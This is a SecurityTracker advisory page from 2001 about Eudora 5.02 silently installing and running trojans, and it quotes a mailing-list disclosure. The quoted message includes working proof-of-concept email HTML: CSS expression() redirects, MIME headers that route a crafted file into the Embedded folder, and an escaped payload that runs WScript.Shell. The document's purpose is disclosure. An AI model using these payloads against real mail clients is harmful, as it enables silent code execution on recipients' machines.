SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Client)  >   Eudora Vendors:   Qualcomm
(Contains Additional Exploit Code) Re: Eudora E-mail Client May Silently Install and Execute Malicious Trojan Software
SecurityTracker Alert ID:  1001137
SecurityTracker URL:  http://securitytracker.com/id/1001137
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 22 2001
Impact:   Execution of arbitrary code via network

Version(s): 5.02 Sponsored Mode
Description:   A vulnerability has been reported in Qualcomm's Eudora e-mail client that allows malicious trojan code to be installed and executed automatically and without warning by an unwitting recipient when the e-mail is read.

Some demonstration exploit code is provided in the source message. This exploit code is reportedly effective even if the "Allow executables in HTML content" setting is disabled.

Impact:   An unsuspectig Eudora e-mail client user may inadvertently cause malicious trojan software to be installed and executed by reading a malicious e-mail message.
Solution:   No solution was available at the time of this entry. The author of the report suggests disabling "use Microsoft viewer" and "allow executables in HTML content."
Vendor URL:  www.eudora.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Apple (Legacy "classic" Mac), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
Mar 19 2001 Eudora E-mail Client May Silently Install and Execute Malicious Trojan Software



 Source Message Contents

Subject:  Re: feeble.you!dora.exploit


Further to all of this, we include a generic more illustrative (and user
friendly test working example) [at the end of this batch of quotes].

This defeats the so-called "Allow executables in HTML content" being
disabled.

Example at the end of this screed.

On Tue, 20 Mar 2001 11:23:48 -0800 (PST), http-equiv@excite.com wrote:

|  |Jeff Beckley wrote:
|  |
|  |>At 01:38 AM 3/18/2001 -0800, http-equiv@excite.com wrote:
|  |>Silent delivery and installation of an executable on a target
|  |>computer. No client input other than opening an email using
|  |>Eudora 5.02 - Sponsored Mode provided 'use Microsoft viewer'
|  |>and 'allow executables in HTML content' are enabled.
|  |
|  |
|  |The "Allow executables in HTML content" setting is turned off by
|  |default.  The online help and user manual mention that the
|  |setting should remain off for security reasons.
|
|  This of course is 100% correct. Unfortunately on closer   |  examination
we find
|  that this too can be defeated quite easily.  Consider the following
|  non-JavaScript:
|
|
|  <!doctype html public "-//w3c//dtd html 4.0 transitional//en">
|
|  <img
SRC="file://C:\WINDOWS\APPLIC~1\QUALCOMM\EUDORA\Embedded\malware.gif"
|  height=2 width=2
|  STYLE="left:expression(location.href='http://www.malware.com');"></html>
|
|  <br>
|  <br>
|  </body></html>
|
|  This slips through, with "Allow executables in HTML content" |disabled.
|  therefore the results will be the same:
|
|  <img SRC="" height=1 width=1
|  STYLE="left:expression (malware.location.href='cid:malware.com');"></
|
|  ...etc
|
|  Disable the 'Microsoft Viewer" thing. That's the problem.
|
|  A good repair can be by reviewing all the necessary tricks to inject
|  JavaScript into Hotmail Accounts. These are well documented here and
dating
|  back for quite some time. It appears the mail client seeks typical script
|  tags, which is defeated as above.  Additional you might want to not allow
a
|  crafted inline file to transfer automatically to your embedded folder:
|
|  Content-Type: application/octet-stream; charset=iso-8859-1
|  Content-ID: <malware.com>
|  Content-Transfer-Encoding: base64
|  Content-Disposition: inline; filename="You!DORA.html"
|
|  We note that if the content-type is manipulated we can route the file to
the
|  'Embedded' folder. Casual observation suggests image files and *.exe are
|  routed there. While *.html is not, hence the constructed Content-Type:
|  application/octet-stream; charset=iso-8859-1 while the file is:
|  Content-Disposition: inline; filename="You!DORA.html"
|
|
|  ---
|  http://www.malware.com
|
|

This is specifically constructed to fire the ActiveX warning so that it is
visually illustrated (harmless WSH to fire telnet if you click okay)

REPEAT: this is by design and only for illustrative purposes (lest some
idiot complain this demo has a warning and is a lame "exploit").

  <img SRC="cid:malware.com" height=2 width=2
STYLE="left:expression(document.write('\u0020\u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u0076\u0061\u0072\u0020\u0077\u0073\u0068\u003d\u006e\u0065\u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065\u00
63\u0074\u0028\u0027\u0057\u0053\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0068\u0065\u006c\u006c\u0027\u0029\u003b\u0020\u0020\u0077\u0073\u0068\u002e\u0052\u0075\u006e\u0028\u0027\u0074\u0065\u006c\u006e\u0065\u0074\u002e\u0065\u0078\u0065\u002
7\u0029\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u003c\u0021\u002d\u002d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0061\u006c\u0077\u0061\u0072\u0065\u002e\u0063\u006f\u006d\u0020\u0032\u0032
\u002e\u0030\u0032\u002e\u0030\u0031\u0020\u002d\u002d\u003e'))">

Once again:

Tested on win98, IE5.5, "Eudora 5.0.2 -- Sponsored Mode", "Microsoft Viewer"
enabled, "Allow executables in HTML content" DISABLED.


end call

---
http://www.malware.com






_______________________________________________________
Send a cool gift with your E-Card
http://www.bluemountain.com/giftcenter/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC